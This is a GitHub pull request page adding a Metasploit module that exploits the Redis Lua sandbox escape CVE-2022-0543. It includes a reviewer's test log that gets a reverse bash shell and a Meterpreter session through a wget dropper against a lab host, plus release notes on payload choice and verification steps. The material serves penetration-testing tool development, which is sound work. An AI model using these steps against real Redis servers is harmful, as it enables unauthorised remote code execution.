Redis Sandbox Escape RCE (CVE-2022-0543) #16504
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
space-r7
reviewed
Apr 26, 2022
There was a problem hiding this comment.
Just a couple minor suggestions. Got it tested without auth:
Output
msf6 > use exploit/linux/redis/redis_debian_sandbox_escape
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > options
Module options (exploit/linux/redis/redis_debian_sandbox_escape):
Name Current Setting Required Description
---- --------------- -------- -----------
LUA_LIB /usr/lib/x86_64-linux-gnu/lib yes LUA library path
lua5.1.so.0
PASSWORD mypassword no Redis AUTH password
RHOSTS yes The target host(s), see https://github.com/rapid7/me
tasploit-framework/wiki/Using-Metasploit
RPORT 6379 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. Th
is must be an address on the local machine or 0.0.0.
0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randoml
y generated)
TARGETURI / yes Base path
THREADS 1 yes The number of concurrent threads (max one per host)
URIPATH no The URI to use for this exploit (default is random)
Payload options (cmd/unix/reverse_bash):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Unix Command
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set rhost 192.168.140.140
rhost => 192.168.140.140
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > check
[+] 192.168.140.140:6379 - The target is vulnerable. Successfully executed the 'id' command.
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > run
[*] Started reverse TCP handler on 192.168.140.1:4444
[*] 192.168.140.140:6379 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.140.140:6379 - The target is vulnerable. Successfully executed the 'id' command.
[*] 192.168.140.140:6379 - Executing Unix Command for cmd/unix/reverse_bash
[+] 192.168.140.140:6379 - Exploit complete!
[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.140:48772 ) at 2022-04-26 13:24:42 -0500
id
uid=126(redis) gid=133(redis) groups=133(redis)
uname -a
Linux ubuntu 5.13.0-40-generic #45~20.04.1-Ubuntu SMP Mon Apr 4 09:38:31 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 1? [y/N] y
[*] 192.168.140.140 - Command shell session 1 closed. Reason: User exit
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set target 1
target => 1
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > run
[*] Started reverse TCP handler on 192.168.140.1:4444
[*] 192.168.140.140:6379 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.140.140:6379 - The target is vulnerable. Successfully executed the 'id' command.
[*] 192.168.140.140:6379 - Executing Linux Dropper for linux/x86/meterpreter_reverse_tcp
[*] 192.168.140.140:6379 - Using URL: http://192.168.140.1:8080/963M5aN
[*] 192.168.140.140:6379 - Client 192.168.140.140 (Wget/1.20.3 (linux-gnu)) requested /963M5aN
[*] 192.168.140.140:6379 - Sending payload to 192.168.140.140 (Wget/1.20.3 (linux-gnu))
[+] 192.168.140.140:6379 - Exploit complete!
[*] 192.168.140.140:6379 - Command Stager progress - 100.00% done (113/113 bytes)
[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.140:48774 ) at 2022-04-26 13:24:59 -0500
[*] 192.168.140.140:6379 - Server stopped.
meterpreter > getuid
Server username: redis
meterpreter > sysinfo
Computer : 192.168.140.140
OS : Ubuntu 20.04 (Linux 5.13.0-40-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
documentation/modules/exploit/linux/redis/redis_debian_sandbox_escape.md
Outdated
Show resolved
Hide resolved
…_escape.md Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
jvoisin
approved these changes
Apr 26, 2022
| # Before we get crazy sending exploits over the wire, let's just check if this could | ||
| # plausiably be a vulnerable version. Using INFO we can check for: | ||
| # | ||
| # 1. 4 < Version < 6.1 |
There was a problem hiding this comment.
Maybe order those in the same orders as the actual checks done bellow?
Release NotesThis exploit achieves remote code execution as the |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. This has been exploited in the wild. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries.
On a typical
redisdeployment (not docker), this module achieves execution as theredisuser. Debian/Ubuntu packages run Redis using systemd with the "MemoryDenyWriteExecute" permission, which limits some of what an attacker can do. For example, staged meterpreter will fail when attempting to use mprotect. As such, stageless meterpreter is the preferred payload.Redis can be configured with authentication or not. This module will work with either configuration (provided you provide the correct authentication details). This vulnerability could theoretically be exploited across a few architectures: i386, arm, ppc, etc. However, the module only supports x86_64 (mostly due to the lack of test targets), which is likely to be the most popular version.
Failed Linting
I expect this to fail linting due to the
has_check?call. However, this is required. See #13143Other Weird Things
As mentioned above, the default Meterpreter is stageless due to the use of "MemoryDenyWriteExecute" otherwise causing the staged version to crash on failed mprotect. Technically, the Docker version could execute a staged Meterpreter but there is also no command stager (other than printf/echo and I don't want to make those options since they won't work in the normal case). And I guess I should clarify that means that
target 1does not work against the Docker target but does work against a normal Ubuntu install. I think this is fine since actually exploitable targets in the wild, in my opinion, are far more likely to be non-Docker targets.Verification
Follow the setup steps in the documentation.
use exploit/linux/redis/redis_debian_sandbox_escapeset RHOST <ip>set LHOST <ip>set PASSWORD <password>checkrunPoC Video || GTFO
https://www.youtube.com/watch?v=N5J7laXlMuo
PCAP || GTFO
redis_exploitation.zip